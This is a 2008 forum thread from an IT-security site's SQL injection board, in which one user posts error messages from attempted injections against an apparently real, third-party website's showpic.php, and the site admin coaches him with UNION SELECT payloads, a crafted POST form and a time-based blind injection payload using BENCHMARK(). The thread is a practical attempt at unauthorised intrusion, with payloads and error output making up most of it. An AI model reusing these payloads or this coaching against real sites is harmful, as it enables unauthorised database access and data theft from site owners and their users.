|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 70
Members: 0
Total: 70
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL help |
|
Posted: Sat Apr 26, 2008 1:42 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
I dont really know what's going on here.
Code: |
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/****/public_html/showpic.php on line 11
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1-- and setting_id=2 and value=1' at line 1 |
Code: |
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home//****//public_html/showpic.php on line 11
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1/* and setting_id=2 and value=1' at line 1 |
Code: |
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home//****//public_html/showpic.php on line 11
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1\\\' and setting_id=2 and value=1' at line 1 |
How do I unescape quotes?
I even tried this to do php code:
And the page returns:
Code: |
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/****/public_html/showpic.php on line 11
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '= and setting_id=2 and value=1' at line 1 |
And when I view the source:
Code: | <br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/****/public_html/showpic.php</b> on line <b>11</b><br />
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<?php phpinfo() ?> and setting_id=2 and value=1' at line 1 |
Of course at least XSS works lol. |
|
|
|
|
|
|
|
|
Posted: Sat Apr 26, 2008 3:09 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You don't need single quotes here to get syntax right! Try using parentheses:
Code: |
-1)+UNION+ALL+SELECT+1--+
|
Code: |
-1))+UNION+ALL+SELECT+1--+
|
Can you post here whole GET request (with private info changed) ? |
|
|
|
|
|
|
|
|
Posted: Sun Apr 27, 2008 5:22 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
I've been using POST request..
Code: | <form method = "POST" action=http://www.*****/showpic.php>
<input type=hidden name = pic value = 20910>
<input type=hidden name = oid value = ")+UNION+ALL+SELECT+1--+ ">
<input type=submit name = hi >
</form> |
Code: | Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/**/public_html/showpic.php on line 11
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')+UNION+ALL+SELECT+1--+ and setting_id=2 and value=1' at line 1 |
Same problem for ))+UNION+ALL+SELECT+1--+
Oh, when I try
Code: | -1)+UNION+ALL+SELECT+1--+ |
It just says this..
Code: | Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/**/public_html/showpic.php on line 11
The picture you are attempting to view does not exist or has been deleted by an Administrator. |
|
|
|
|
|
|
|
|
|
Posted: Sun Apr 27, 2008 11:41 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try this:
Code: |
-1)+UNION+ALL+SELECT+1,2--+
|
Code: |
-1)+UNION+ALL+SELECT+1,2,3--+
|
What error messages you see? |
|
|
|
|
Posted: Sun Apr 27, 2008 12:17 pm |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Always this: Code: | Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/**/public_html/showpic.php on line 11
The picture you are attempting to view does not exist or has been deleted by an Administrator. |
i tried select 1,2,3,4, etc. |
|
|
|
|
Posted: Sun Apr 27, 2008 1:17 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
OK, this seems to be complicated case. Try BENCHMARK() and watch for response delay. If this will work, then use blind sql injection attack.
Example:
Code: |
-1 OR IF(1,BENCHMARK(500000,MD5(123)),2)
|
By the way, as you are making POST request, then don't use "+" sign for space, use " ". I did not know, that you are using POST, when i answered first. |
|
|
|
|
Posted: Mon Apr 28, 2008 1:15 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Nothing. I will give up, perhaps look for another exploit. Thanks anyway waraxe. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|